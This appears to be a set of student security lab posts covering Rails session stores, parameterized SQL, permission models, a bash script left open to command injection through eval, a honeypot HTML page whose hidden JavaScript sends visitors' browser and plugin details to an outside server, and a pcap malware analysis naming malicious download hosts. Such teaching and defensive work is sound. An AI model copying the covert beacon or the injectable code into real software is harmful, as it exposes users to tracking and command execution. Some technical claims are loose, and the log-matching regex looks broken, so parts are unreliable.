The main goal of this post is to introduce the reader with the security programing techniques into deferent program languages and operating system security models. The post is introducing four following topics:

1. Session storage’s in Ruby on Rail
2. Parameterized statements into Java with JDBC, C# with ASP.NET, PHP5, php-mysqli, Perl, Python and Hibernate Query Language (HQL)
3. Unix permission model, Unix ACL and Windows 7 security
   model
4. Finding all the security vulnerabilities in bash script

Each topic will be divided into own section, where at the end of each topic we stated the reference and additional reading material. The source code, scrips and the additional task were given by the lecture. However this will help the readers and people interesting into programing for further work and involvement with the above topics.

1. Session storage’s in Ruby on Rail

Session in Rails is a hash-like structure which allows you to store data across requests.
Sessions can hold any kind of data object (with some limitations) because they store
data using Data Marshalling.Session in rails it is not a hash. Session creates new
instant of session in every time new user visit the site. Recommendation is to not store
large objects in a session and critical data should not be stored in session.Rails way of
implementing session is:

1. session_id is a 32 hex character MD5 hash based upon time, random number and constant string. It is stored in cookie at client browser. Rails provides transparent support for session_id.
2. Session storage discussed below.

Ruby on Rails provides with many session storage option:

1. PStore – it implements a file based persistence mechanism based on a Hash. User code can store hierarchies of Ruby objects (values) into the data store file by name (keys). An object hierarchy may be just a single object. User code may later read values back from the data store or even update data, as needed. The files that are stored are usually located in the tmp/sessions folder for the Rails app. The main downside of using the PStore is that you will have to do some session-pruning periodically because performance decreases as the number of sessions stored increases.
2. ActiveRecordStore – keeps the session id and hash in a database table and saves and retrieves the hash on every request.
3. CookieStore – it saves the session hash directly in a cookie on the client-side. The server retrieves the session hash from the cookie and eliminates the need for a session id. Cookie-based sessions are just faster to retrieve and process than hitting the file-system on every request, were it was previously. Cookies are generally limited to 4K in size. While not an issue for most (proper) usage of the session, this could be a legitimate limit for some scenarios. If your application abuses the session, you’ll need to decide on a different session store that are available. The cookie has a SHA512 fingerprint attached and is hashed with a secret stored up on the server and there are, however, derivatives of CookieStore which encrypt the session hash, so the client cannot see it.
4. DRbStore – it store uses distributed Ruby to store a user’s session data. The performance is great, but it requires a bit more setup than the other stores.
5. FileStore – This store keeps the fragments on the hard disk instead of in memory. It works well if you have a lot of file storage and have outgrown the MemoryStore.
6. MemoryStore – keeps your session data in server memory. It keeps the fragments in your application’s memory, which can potentially take up a lot of memory on your server. It is used by default, but it is hard to manage and scale if your application becomes popular.

Note: Ruby on Rail CookieStore is available only in edge rails. PStore is the default option for stable release, whereas its CookieStore as default for edge rails.

Reference

Ruby On Rails Security Guide, From: http://guides.rubyonrails.org/security.html
Sessions and cookies in Ruby on Rails, From: http://www.quarkruby.com/2007/10/21/
sessions-and-cookies-in-ruby-on-rails#sstorage
What’s New in Edge Rails: Cookie Based Sessions are the New Default, From: http://
ryandaigle.com/articles/2007/2/21/what-s-new-in-edge-rails-cookie-based-sessions

2. Parameterized statements into Java with JDBC, C# with ASP.NET, PHP5, php-mysqli, Perl, Python and Hibernate Query Language (HQL)

For this task we will take a look at the parameterized statement API-s and we will find out and document how much does each of them protect against the following possible
misuses of SQL statements:

• String injection (quotes, double quotes)
• SQL statement injection (expression syntax etc)
• Out of range integers
• Blind SQL injection

Java with JDBC

PreparedStatement prep =
conn.prepareStatement("SELECT * FROM
USERS
WHERE USERNAME=? AND PASSWORD=?");
prep.setString(1, username);
prep.setString(2, password);
prep.executeQuery();

There are no possibilities of string injection because of the filtering the statements. It enables users’ input to be initially filtered instead  of directly embedding it in the SQL statements. In this example is that the each parameter is a scalar, not a table, where the user input is then assigned (bound) to a parameter. It is a good idea if the character range is limited. Another thing that can be done to avoid SQL injection is to convert numeric values to integers before parsing them into the SQL statement. Or using ISNUMERIC to verify that they are integers.

C# with ASP.NET

using (SqlCommand myCommand =
new SqlCommand("SELECT * FROM USERS
WHERE
USERNAME=@user AND
PASSWORD=HASHBYTES(’SHA1’, @pwd)",
myConnection))
{
myCommand.Parameters.AddWithValue("@user",
user);
myCommand.Parameters.AddWithValue("@pwd",
pass);
myConnection.Open();
SqlDataReader myReader =
myCommand.ExecuteReader();
...
}

The placeholder – @user and the hashbyte value of password @pws – has become part  if the hardcoded SQL. At runtime, the value provided by the querystring is passed to the database along with the hardcoded SQL, and the database will check the Username and password field as it attempts to bind the parameter value to it. This ensures a level of strong typing. If the parameter value is not the right type for the database field (a string, or numeric that’s out of range for the field type), the database will be unable to convert it to the right type and will reject it. If the target field datatype is a string (char, nvarchar etc), the parameter value will be “stringified” automatically, which includes escaping single quotes. It will not form part of the SQL statement to be executed.

PHP5

$db = new PDO(’pgsql:dbname=database’);
$stmt = $db->prepare("SELECT priv FROM
testUsers WHERE
username=:username AND password=:password");
$stmt->bindParam(’:username’, $user);
$stmt->bindParam(’:password’, $pass);
$stmt->execute();

In this example to protect against SQL injection, it is used an input not directly to be  embedded in SQL statements. Instead, it is used an parameterized statements (preferred), or user input must be carefully escaped or filtered. This example shows and parameterized example/statement in php v. 5 and PDO database to protect from SQL injections and blind SQL injections.

PHP-MySQLi

$db = new mysqli("host", "user", "pass",
"database");
$stmt = $db -> prepare("SELECT priv FROM
testUsers
WHERE username=? AND password=?");
$stmt -> bind_param("ss", $user, $pass);
$stmt -> execute();

Same as above but this time it is used the vendor-specific methods; for instance, using the mysqli extension for MySQL 4.1 and create parameterized statements to protect from the SQL injection.

Perl

use DBI;
my $db = DBI-
>connect(’DBI:mysql:mydatabase:host’,
’login’, ’password’);
$statment = $db->prepare("UPDATE players SET
name = ?,
score = ?, active = ? WHERE jerseyNum = ?");
$rows_affected = $statment->execute("Smith,
Steve",
42, ’true’, 99);

Automatically “sanitize” input to parameterized SQL statements to avoid the catastrophic  database attacks.

Python

import sqlite3
db = sqlite3.connect(’:memory:’)
db.execute(’update players set name=:name,
score=:score,
active=:active where jerseyNum=:num’,
{’num’: 100,
’name’: ’John Doe’,
’active’: False,
’score’: -1}
)

It is parameterized statement with an example of named placeholders. Which insure to avoid the SQL injections and database attacks.

Hibernate Query Language (HQL)

Query safeHQLQuery = session.createQuery(
"from Inventory where productID=:productid");
safeHQLQuery.setParameter("productid",
userSuppliedParameter);

Unsafe example: Query unsafeHQLQuery = session.createQuery(“from Inventory where
productID=’”+userSuppliedParameter+”‘”); The example from left it’s used prepared statement approach because all the SQL code stays within the application. This makes your application relatively database independent. However, other options allow you to store all the SQL code in the database itself, which has both security and non-security
advantages and the approach is called Stored Procedure

3. Unix permission model, Unix ACL and Windows 7 security
model

In this topic we will describe two security set-ups that can not be expressed with traditional Unix permission model, UNIX ACL and Windows 7 security model.

Unix permission model

• Giving an different permission to different users in the same group
• Read and write permission/access to all groups, which gives and access to the ‘private files’, and you can gain access through a root account by an unwanted user, which brings and complete breach of the system

Unix ACL- enabled permission model

• If the user has permission over the file, he can read/write and delete it, which brings that it is not possible to give ‘some’ permission to the user.
• ACL’s are not very portable and are very hard to maintain. For instance good example is transferring of files with ACL’s between different of Unix systems is an exercise for brave person, even if the both file systems support them. Which brings a difficulty to maintain for existing files for instance backup, restore, copying, etc.

Windows 7 security model

• As a standard user you can perform an action that requires administrator privileges by the UAC(User Access Control), which is controlled by the Admin Approval Mode. It can be turn off and on. Every time when you need to gain an access of the administration privileges it will be prompt a dialog box to gain and provide the password for an access. Therefore in the medium settings with any malware could turn it off.
• And the settings of the UAC are in medium mode not off, still brings an opportunity to being turn off by the malware.

4. Finding all the security vulnerabilities in bash script

In this topic we will find all the possible vulnerabilities into the following bash script:

#!/bin/sh
# remove files with name pattern matching regexp
if [ x$1 = x ]; then
# if [[ x$1 = x ]]
echo -n "Please enter directory name: "
read dir
else
dir=$1
fi
if [ x$2 = x ]; then
# if [[ x$2 = x ]]
echo -n "Please enter pattern: "
read pattern
else
pattern=$2
fi
find $dir > /tmp/listing
# can use >> or print the output first before
cmd='rm `grep '$pattern' /tmp/listing`' #+the command is execute
echo "Running command $cmd"
eval $cmd //it converts string in command
rm /tmp/listing
exit 0

We should avoid temporary file, instead we should use pipes [2].
We should avoid eval [2].
Using the double brackets, instead of single one ([[... ]]) it is comment on the script above [1].
$REPLY can be used to read the previous value of the dir and pattern variable [1].
We can use instead of find, while read contracture (loop) [1]. Find – can be set with a cycle, for or while to check the validation of the file and the directory/path, also comment on the script or using “$pattern” /tmp/listing [1].
No sensitization of the input, the user can put any value and therefore, execute any command to create another command.
As we can see above the script it looks like that it is security vulnerable. If we want to
implement the security in the script we should implement the above changes into the script.

Reference:

[1] Mendel Cooper, 30 April 2011. Advanced Bash-Scripting Guide; An in-depth exploration of the art of shell scripting. Retrieved from: http://tldp.org/LDP/abs/html/index.html
[2] Lecture 8 slides Scripting, Meelis Roos. Retrieved from file: 08-scripting.pdf

The main goal of laboratory report is to identify possible leaked/stolen information,
documents from our system without recognising that attacker had an access. Thus access of the document will inform us immediately with the information of the burglar. The report should highlight the following aspects:

• Constructed an document as non malicious code, for instance honey document that will help us to track from where, who, information about the system, etc. is using our document.
• Detail description of process, how did we build the document and the idea behind the tracking system.
• Description of needed infrastructure that is tracking the document.

The laboratory report is created by a team of 7 members. Where each member had
own task to accomplish.
Moreover, to be more contingent the unknown person has gain access to our
computer/laptop. Thereby he is looking for interesting name of file, folder, etc. that most
likely will have a content of interesting data, information for his purpose. After he
downloaded file/folder from our system the intruder will open this file in his system
assuming that contains very important personal/corporate information. However, by
opening this file/folder, document it will send us immediately leaked information about his
system to our server and additionally an e-mail. This process and procedures that are
behind the honeypot document, or with other words trap set to detect, deflect, or in some
manner counteract attempts at unauthorized use of information systems [1] is described in following sections.
Furthermore, the coding of the honeypot document is done in HTML file with
additional java script queries, where detail information and construction are displayed in
Honeypot section.
Meanwhile in Appendix section we provide the code of the honeypot document and
additional what is the leaked/collected information of the intruder system, with other word,
content illustration of mail and server logs.

Finally the conclusion made of the laboratory report will be concise in summary
section.

HONEYPOT IDEA

HTML file We can name the file online banking or etc. cause it is html and it is more
convincing way that the attacker will assume that this is an not only a online banking link
but yet an the stored cookies and other leaked information.
The honeypot file has inline javascript that will collect as much information as it can
from the users browser, make it into a JSON object and create a request to our server
using that information. The request will return an image, so nothing will be broken,
however on our server we decode the information and send ourselves an alert email, that
someone has accessed that document and where the accessing came from. There is also an image embedded that requests it from our server- these requests are logged and we see the IP address of the opener. This is as a backup in case the user doesn’t allow
javascript to execute.
How we lure an attacker into trap
To discover the identity of attacker and get information, she/he has to open html file.
Besides setting up honeypot from technical point of view, we have to make document
attractive.
On our system all the documents will be protected by (different) passwords. We can
have same password for files with same extensions (for example, for PDFs or for MS Word documents).
In html file, we store these passwords. The name of html document should be
corresponding (“file passwords” for example). Attacker will need additional time to crack
the passwords, so we are offering easy, quick way to get over additional obstacles.
Actually, in html file passwords should be correct not no make the attacker suspicious.
Attacker may be suspicious why we stored this kind of information in html file, but it
can be explained with the following reasons: a) to open html (with notepad or browser for
example) is quicker than opening .pdf and .doc (by Adobe Reader and MS Word
respectively) b) html has different extension (.html) that PDF or MS Word documents, so it has different icon in GUI. If you put a lot of different files in a folder, html is much easier to find with a glance among PDFs and DOCs.

What information we get

The honeypot is scripted to give us the following information about the attacker: first of all IP address. Time, when the attacker accessed the honeypot file.
Except that, we also get information about user agent, OS, language and other details
about attacker’s system. For this concrete task that should be enough. The script is configurable to get some additional information too. As our plan is to simply gather information on our infiltrator, it is essential to avoid being malicious with our code. It will not alter target’s system or bypass any restrictions of it. The solution will not announce itself and will be as stealthy as possible.
The information is sent to mail. For the example of sent e-mail, please refer to Appendix 2.

HONEYPOT INFRASTRUCTURE

We need a Web server running PHP. The PHP script will collect the JSON data received
from the attacker, format it nicely and send via email to people who will process it. If
JavaScript is not enabled on the attacker’s side we rely on the fact that a picture is
accessed from the honeypot html file. The server has to serve this image and the request
for it of course appears in the web server access logs. This information again is processed by the same PHP script mentioned above and forwarded to analysts. Another alternative way to inform security personnel about this honeypot image being accessed is the Simple Event Corelator (SEC) written by Risto Vaarandi [2]. This software is freely available under GPL license. We could write a rule for SEC that would monitor the web server access log file for the specific image file request and send an email with the IP address from which the image was accessed. The rule that is used for SEC can be found in Appendix 3. The content we are looking for in the log file may look like this:

192.168.1.34 - - [07/Dec/2011:19:16:07 +0200] "GET /honey.png HTTP/1.1" 200 1932

SUMMARY

Nowadays the most common vector in unauthorized access into the system is followed by stealing important data, either is from personal computer or corporate network. Therefore, solution of implementing a trap for detecting, and deflecting the attacker of collecting valuable information is important. This laboratory report consists solution for future detection, by creating an honeypot document that will help us to collect data from the attacker. The document it self it is not an malicious code, likewise does not corrupt or infect the attacker system. Solution provided above is designed with an simple infrastructure which help us to identify identity of attacker in different operation system.
Moreover, the honeypot document provides us an information of what is the attacker
or user of this document operation system, which browser he is using, what plugins are
installed in the browser and additional the time of accessing the file and attached IP
address. Thereby, by identifying the above information will guide us in further steps. For
instance by identifying his IP address we can find his location, ISP, etc.
However, is this above provided information enough? The answer to the question is
simple, indeed it is, cause we don’t need more. The idea in this laboratory is not to find or
assail the attacker, but it is just to identify, and realize that someone had an unauthorized
access to the system and to distinguish his identity.
Consequently, from the above we can conclude that we rather gather the
information from the attacker then to attack him back.

APPENDICES

Appendix 1 is the HTML and Java script code presented and in addition in Appendix 2 we
present the e-mail received after the attacker has open the document. SEC are described
in Appendix 3

Appendix 1

HTML + Java script code presented below:

<!--
To change this template, choose Tools | Templates
and open the template in the editor.
-->
<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<script type="text/javascript">
var JSON;JSON||(JSON={});
(function(){function k(a){return 10>a?"0"+a:a}function o(a){p.lastIndex=0;return
p.test(a)?'"'+a.replace(p,function(a){var c=r[a];return"string"===typeof c?c:"\\u"+
("0000"+a.charCodeAt(0).toString(16)).slice(-4)})+'"':'"'+a+'"'}function m(a,j){var
c,d,h,n,g=e,f,b=j[a];b&&"object"===typeof b&&"function"===typeof
b.toJSON&&(b=b.toJSON(a));"function"===typeof i&&(b=i.call(j,a,b));switch(typeof b)
{case "string":return o(b);case "number":return isFinite(b)?""+b:"null";case
"boolean":case "null":return""+b;
case "object":if(!b)return"null";e+=l;f=[];if("[object
Array]"===Object.prototype.toString.apply(b))
{n=b.length;for(c=0;c<n;c+=1)f[c]=m(c,b)||"null";h=0===f.length?"[]":e?"[\n"+e+f.join("
,\n"+e)+"\n"+g+"]":"["+f.join(",")+"]";e=g;return h}if(i&&"object"===typeof i)
{n=i.length;for(c=0;c<n;c+=1)"string"===typeof i[c]&&(d=i[c],(h=m(d,b))&&f.push(o(d)+
(e?": ":":")+h))}else for(d in
b)Object.prototype.hasOwnProperty.call(b,d)&&(h=m(d,b))&&f.push(o(d)+(e?": ":":")
+h);h=0===f.length?"{}":e?"{\n"+e+f.join(",\n"+
e)+"\n"+g+"}":"{"+f.join(",")+"}";e=g;return h}}if("function"!==typeof
Date.prototype.toJSON)Date.prototype.toJSON=function(){return isFinite(this.valueOf())?
this.getUTCFullYear()+"-"+k(this.getUTCMonth()+1)+"-"+k(this.getUTCDate())
+"T"+k(this.getUTCHours())+":"+k(this.getUTCMinutes())+":"+k(this.getUTCSeconds())
+"Z":null},String.prototype.toJSON=Number.prototype.toJSON=Boolean.prototype.toJSON=fun
ction(){return this.valueOf()};var q=/
[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufe
ff\ufff0-\uffff]/g,
p=/
[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\
u2060-\u206f\ufeff\ufff0-\uffff]/g,e,l,r={"\u0008":"\\b","\t":"\\t","\n":"\\n","\u000c"
:"\\f","\r":"\\r",'"':'\\"',"\\":"\\\\"},i;if("function"!==typeof
JSON.stringify)JSON.stringify=function(a,j,c){var d;l=e="";if("number"===typeof
c)for(d=0;d<c;d+=1)l+=" ";else"string"===typeof c&&(l=c);if((i=j)&&"function"!==typeof
j&&("object"!==typeof j||"number"!==typeof j.length))throw
Error("JSON.stringify");return m("",
{"":a})};if("function"!==typeof JSON.parse)JSON.parse=function(a,e){function c(a,d){var
g,f,b=a[d];if(b&&"object"===typeof b)for(g in
b)Object.prototype.hasOwnProperty.call(b,g)&&(f=c(b,g),void 0!==f?b[g]=f:delete
b[g]);return e.call(a,d,b)}var
d,a=""+a;q.lastIndex=0;q.test(a)&&(a=a.replace(q,function(a){return"\\u"+
("0000"+a.charCodeAt(0).toString(16)).slice(-4)}));if(/^[\],:
{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]
{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,
"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return d=eval("("+a+")"),"function"===typeof
e?c({"":d},""):d;throw new SyntaxError("JSON.parse");}})();
</script>
<script type="text/javascript">
var l=window.navigator,q={},a={},r={};delete l.geolocation;for(var i in
l.plugins)a[i]={},a[i].description=l.plugins[i].description,a[i].filename=l.plugins[i].
filename,a[i].name=l.plugins[i].name;delete l.plugins;delete
l.mimeTypes;q.plugins=a;q.nav=l;var h=JSON.stringify(q),s="?
i="+encodeURIComponent(h);document.write('<img
src="http://78.47.222.185/honey.php'+s+'" />');
</script>
<div>TODO write content</div>
<img src="http://78.47.222.185/honey.png" />
</body>
</html>

Appendix 2

What we receive via email:

stdClass Object
(
[plugins] => stdClass Object
(
[0] => stdClass Object
(
[description] => Shockwave Flash 11.1 r102
[filename] => gcswf32.dll
[name] => Shockwave Flash
)
[1] => stdClass Object
(
[description] => Shockwave Flash 11.1 r102
[filename] => NPSWF32.dll
[name] => Shockwave Flash
)
[2] => stdClass Object
(
[description] => NPRuntime Script Plug-in Library for Java(TM)
Deploy
[filename] => npdeployJava1.dll
[name] => Java Deployment Toolkit 7.0.10.8
)
[3] => stdClass Object
(
[description] => 4.0.60831.0
[filename] => npctrl.dll
[name] => Silverlight Plug-In
)
[4] => stdClass Object
(
[description] =>
[filename] => internal-remoting-viewer
[name] => Remoting Viewer
)
[5] => stdClass Object
(
[description] =>
[filename] => ppGoogleNaClPluginChrome.dll
[name] => Native Client
)
[6] => stdClass Object
(
[description] =>
[filename] => pdf.dll
[name] => Chrome PDF Viewer
)
[7] => stdClass Object
(
[description] => DivX VOD Helper Plug-in
[filename] => npovshelper.dll
[name] => DivX VOD Helper Plug-in
)
[8] => stdClass Object
(
[description] => DivX Plus Web Player version 2.1.3.529
[filename] => npdivx32.dll
[name] => DivX Plus Web Player
)
[9] => stdClass Object
(
[description] => Allows digital signing with Estonian ID cards
[filename] => npesteid-firefox-plugin.dll
[name] => EstEID Firefox plug-in
)
[10] => stdClass Object
(
[description] => Google Update
[filename] => npGoogleUpdate3.dll
[name] => Google Update
)
[11] => stdClass Object
(
[description] => Provides functionality for installing third-party
plug-ins
[filename] => default_plugin
[name] => Default Plug-in
)
[length] => stdClass Object
(
)
[item] => stdClass Object
(
[name] => item
)
[namedItem] => stdClass Object
(
[name] => namedItem
)
[refresh] => stdClass Object
(
[name] => refresh
)
)
[nav] => stdClass Object
(
[vendorSub] =>
[product] => Gecko
[userAgent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2
(KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
[language] => en-US
[productSub] => 20030107
[appVersion] => 5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like
Gecko) Chrome/15.0.874.121 Safari/535.2
[onLine] => 1
[platform] => Win32
[vendor] => Google Inc.
[appCodeName] => Mozilla
[cookieEnabled] => 1
[appName] => Netscape
)
)
TIME-1323861098
IP- xxx.xxx.xxx.xxx

Appendix 3

SEC rule file for web server log monitoring (will work only for IPv4). Alerts the root user via email and suppresses alerts for one hours for the same IP address

type=SingleWithSuppress
ptype=RegExp
pattern=^((?:[\d]{1,3}\.){3})\.[\d]) .+ GET /honey.png
desc=Honeypot picture file accessed from $1
action=pipe mail ‘%s’ mail root@localhost
window=3600

Bibliography

1: Wikipedia, Honeypot (computing), 4 December 2011,
http://en.wikipedia.org/wiki/Honeypot_(computing)
2: Risto Vaarandi, SEC man page, NA, http://simple-evcorr.sourceforge.net/man.html

The above post is written by: Predrag Tasevski, Robert Pallas, Kuuno Pärnoja, Mikheil Basilaia, Karl Düüna, Roman Stepanenko and Heliand Dema

The main goal of laboratory report is to identify possible infection of malware into the
wireshark capture file. The report should highlight the following aspects:
• Download https://sim.cert.ee/hw/download.pcap
• Find malware download in this pcap and extract malware or malwares find out
where malware was downloaded from.
• What malware, malwares changes in system.
• C&C Names and address.
• Document the process also where You found hints and how exactly You did it (you
need to show Your thought and communication process – please write a summary of
it.)
• Write an incident report.
Moreover, we have to consider the malware analysis report reminders, please refer
to [1] or [2].
Additional, analysis it is stated into the Analysis section, where we explain the
techniques, filter tools, gather knowledge, links, etc. Structure of the laboratory report is
first to present analysis with details information. Malware and infections description are
described.
Finally the conclusion made of all analysis will be concise in summary section.

ANALYSIS

To be able to open and use the above file, firstly we have to download the wireshark tool.
Where the main goal and purpose for wireshark application is to analysis a network
protocols from captured file. Therefore please refer to the following link: http://www.wireshark.org/
Useful links for future use, please refer to [3], [4], [5] and [6]. On figure 1 it shows
the Graphic Interface of Wireshark application with running filter: http protocol.

Illustration 1: Wireshark application, filter: http protocol

However, from the figure 1 we can see that there is a lot of traffic generated by the
user. Therefore we have to apply and additional filter rules, which will help and guide for
better and easy analysis. As we go through each generated http protocol traffic we can
conclude that the user generated and has been visiting different source, where can be
potential threat for the organization and personal use with a different malicious code.

To be able to filter only the http protocols on port 80 with a header GET, we should
use the following filter: http.request.method == “GET”. Where this filter will narrow down
the results that are presented into the captured file. In spite of the filter above it helps a lot,
yet there is still a lot of traffic generated, consequently we have to utilize an additional filter.

Another extremely useful wireshark option we used, was Analyze → Follow TCP
Stream which shows communication between IP addresses in more readable and useful
way: shows DNS name for the IP and if file was downloaded gives filetype and name.
We discovered that IP address 79.137.237.34 belongs to accord-component.ru. When we
accessed the site with various web browsers, all of them showed that it contained
malware.

GET /serial/index.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET
CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Connection: Keep-Alive
Host: accord-component.ru
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Nov 2011 23:07:18
GMTContent-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Content-Encoding: gzip

Another suspicious IP was 86.63.168.101, where from this IP address brought us to
domain name zumlelao.com, but it was un-accessible from browsers. Wireshark showed the User downloaded file 4.exe from zumlelao.com.

GET /load.php?file=0
HTTP/1.1Accept: image/jpeg, application/x-ms-application, image/gif,
application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: et
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET
CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: zumlelao.com
Connection: Keep-AliveHTTP/1.1 200 OK
Date: Wed, 30 Nov 2011 21:55:02
GMTServer: Apache/2
X-Powered-By: PHP/5.2.17
Cache-Control: public
Content-Disposition: attachment; filename=4.exe
Content-Transfer-Encoding: binary
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10666
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

Additionally, we can always use an Find function, which will help as to identify
certain traffic or site. Figure 2 demonstrated the usage of the Find function, accessible
from menu Edit → Find.

Illustration 2: Wireshark, Find function

Other IP addresses that were generated/extracted first the ones with malware
detected:79.137.237.34 -accord-component.ru; 86.63.168.101 zumlelao.com. Other IP’s
are: 173.194.32.32 (33,34,41,50,51,52,58,59,60,63), 192.168.123.1, 193.184.164.159
(174,176,185), 193.40.252.83, 193.88.71.156, 194.126.108.69 (70), 194.126.124.136,
194.204.14.49, 195.222.15.74, 199.7.48.190, 209.85.173.95, 123.168.24.204 (209,221,225,229,235), 79.137.237.34, 80.252.91.41 (61), 69.171.228.11, 23.32.89.55, 23.32.99.172, 216.34.181.45 (48), 213.168.24.26, 90.190.148.34 (40), 86.63.168.101, 82.98.58.48, 81.19.238.61.

If we run or analysis the above domain names into the google we will automatic
indicated that the zumlelao.com it is an before reported as a malware site and the second
too. Therefore the analysis and the infection of details of malware are highlighted into the
next section.

INFECTION

Indeed, the above captured file presents traffic generated by the user, that can be threat
for the organization, home user, etc. As from the previous section demonstrates how to
identify if the generated traffic has infected or has the user visit the malicious code sites.
This section identifies the malicious code and displays their details.
Moreover, the zumlelao.com host it is reported previous as malicious code site. For
this purpose we gather the help from the following link: http://sopport.clean-mx.de/. Here is
the reported malicious, suspicious code from the above host in the table bellow.

Furthermore, figure 3 is proving the analysis made through the wireshark, were one
of the above links has been access, for more details clink on the above link and points in a figure 3:A and B.

Illustration 3: Prove of generating traffic of following malware link: http://zumlelao.com/load.php? file=0 were B and A are proving the links and the IP initiation.

Moreover, to get the file itself for analysis, we used Netresec’s Network Miner 2.1
http://www.netresec.com/?page=NetworkMiner. In Files menu, it shows all packets as files.
We uploaded 4.exe.octet-stream to virustotal.com – 30 Antivirus software identified as
malware Virustotal link: http://www.virustotal.com/file-scan/report.html?id=d6ee8736cd2eae8571b193b28b59dff33e9607237f78b0888d69c70f241bb04b-
1323098398
MD5 : 94a7f6430510fe7314c1e746bad79bf4
SHA1 : 69ab04c9c586a8cf07a00665e160a48260a2465e
SHA256: d6ee8736cd2eae8571b193b28b59dff33e9607237f78b0888d69c70f241bb04b
F-Secure identified malware as Trojan.Generic.KD.438472

Trojan.Generic.KD malwares usually are classified as Backdoors. It infects
executable files in the system and its main goal is to make backdoor into the system. It
changes registry. In some cases it can put payload on the infected system, slow it down
and make internet browsing difficult and time consuming. Aim of the malware can be
stealing information or gaining partial/full access of the victim’s system. On the other hand, Trojan.Generic.KD malwares are difficult to remove from infected computers.
From VirusTotal analysis we can see that various antivirus software can discover
and identify Trojan.Generic.KD.438472. Therefore one can remove malware by
downloading antivirus software provided by F-Secure, Comodo, Microsoft, Sophos,
Symantec, DrWeb, etc. Here is an example from Dr.Web how to delete Trojan.Generic.KD malware http://www.drwebhk.com/en/virus_removal/694829/Trojan.Generic.KD.53986.html
For our case we downloaded Dr.Web CureIt (free edition for home PCs, which discovered
the malware and removed it) – http://www.freedrweb.com/download+cureit/?nc=t&lng=en.
Before continuing to disinfect the system, please read and understand the massage
delivered through this forum: http://forums.majorgeeks.com/showthread.php?t=35407.

SUMMARY

Nowadays malicious codes, infection of the system is one of the highest vector of
production work everyday of the organizations. Therefore, different approaches, advance
analysis, troubleshooting, etc. has to be applicable and stated in every organization.
Leaking of data, information, access of network (internal and external) can be very harmful for organization and even the home usage of computers. Therefore, this laboratory report main aim is to provide the reader to be able to conduct advance analysis of system and their identification of infection within the wireshark network analysis tool.

From the above sections in Analysis and in the Infection we have to follow the steps
and links that will help us for a further work. Meanwhile, the captured generated traffic from the distributed file has indeed indicated that the system it is infected. Were as an prove we demonstrate an screen-shot, figure 3, that one of the infected link has been visited. Likewise, the system of this user is infected. Thus infection identified name is:
TR/Crypt.XPACK.Gen3, where we do supply and the disinfecting stepwise solution with the above link.
Closing, as there are many different ways, tools, process for analysing the malicious
code behaviours in system this laboratory report is supplying the reader with advance and
stepwise solution for identifying the infection of the system within advance network
analysis wireshark application.

WORKLOAD

We made analysis on the virtual Windows 7 machine. For virtualization we used
VirtualBox. During analysis each of group member did the same analysis to cross-
reference the results.
We basically used the following tools: Wireshark, Network Miner and virustotal.com.

Bibliography

1: Lenny Zeltser, Reverse-Engineering: Malware Analysis Tools and Techniques Training, 2011, http://zeltser.com/reverse-malware/
2: Lenny Zeltser, Malware analysis report reminders, 2011, http://zeltser.com/reverse-
malware/malware-analysis-report-template.mm
3: Kevin, Malware Analysis & Malware Reverse Engineering, NA, http://technology-
flow.com/articles/windows-malware-analysis/
4: Chris Greer, Top 10 Wireshark Filters, April 2010,
http://www.lovemytool.com/blog/2010/04/top-10-wireshark-filters-by-chris-greer.html
5: Russ McRe, Security Analysis with Wireshar, November 2006
6: Chief Banana, Using Wireshark filters for capturing malware, Marh 2011,
http://securitybananas.com/?p=529

The above post is written by Predrag Tasevski and Mikheil Basilaia

Shorter link: http://predragtasevski.com/?p=330

The main goal of laboratory report is to identify possible infection of two Windows 7 virtual
machine. Virtual machines presented by the lecture:

• Win 1
• Win 2

The assignment is following:

Find out what is infecting the machine win1

• Understand which way is the current malware dangerous to “your organisation”
• If possible, do clean win1
• Is win2 clean or it has problems, too?
• If needed, do clean win2

Additionally, deliverable questions should be visible:

• Summary – Your thoughts about the exercise. Please provide a short summary
• Malware that infects machines
• Md5 hash – if it possible and if not, please explain, why.
• Sha256 has -if it possible and if not, then please explain, why.
• A description – in which way that malware is a threat to “You organization”
• Tools You used to find the infection(s)
• Tools You used to clean machine(s)
• Where You found hints and how exactly You did it (you need to show Your thought and communication process – please write a summary of it.)
• How would you evaluate your partner.

Moreover, we have to consider the malware analysis report reminders, please refer to [1] or [2].

Furthermore, each virtual machine will be analysed with different tools, in case to
gather more information and solution for disinfecting process.
Structure of the laboratory report is first to present each virtual machine with details information in section Virtual Machine’s, Each visualization is examined. Malware and disinfection process are described. Meanwhile in appendices, we explain what virtual  environment and tools we have used for this written report.
Finally the conclusion made of all analysis will be concise in summary section.

VIRTUAL MACHINE’s

In this section each virtual machines are going to be examine in sub-sections, analysis  and additionally the disinfection solutions, etc. will be presented. The tools that are used for conducting the analysis are presented in the Tools section.

Win1

